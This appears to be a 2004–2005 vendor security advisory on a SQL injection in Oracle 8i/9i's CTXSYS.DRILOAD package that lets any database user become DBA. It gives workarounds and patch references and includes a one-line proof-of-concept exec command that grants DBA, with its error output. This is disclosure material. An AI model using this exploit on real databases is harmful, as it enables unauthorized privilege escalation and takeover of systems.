Services
Information
Company |
SQL Injection via CTXSYS.DRILOAD in Oracle 8i/9i
Details Any valid database user can become DBA (if CTXSYS is installed) by executing the package DRILOAD by submitting a specially crafted parameter. Oracle 10g is NOT affected. Workarounds Drop user CTXSYS (if not needed) or revoke public grant from CTXSYS.DRILOAD. Example sqlplus scott/tiger@ora902 (or every other unprivileged user) SQL> exec ctxsys.driload.validate_stmt('grant dba to scott'); BEGIN ctxsys.driload.validate_stmt('grant dba to scott'); END; * ERROR at line 1: ORA-06510: PL/SQL: unhandled user-defined exception ORA-06512: at "CTXSYS.DRILOAD", line 42 ORA-01003: no statement parsed ORA-06512: at line 1 Patch Information Please see MetaLink document ID 281189.1 for the patch download procedures and for the Patch Availability Matrix for this Oracle Security Alert. [metalink.oracle.com] History 05-jan-2004 Oracle secalert was informed 06-jan-2004 Bug confirmed 31-aug-2004 Oracle published alert 68 25-apr-2005 Example and time to fix added © 2005 by Red-Database-Security GmbH - last update 03-nov-2005 |
Oracle Workflow |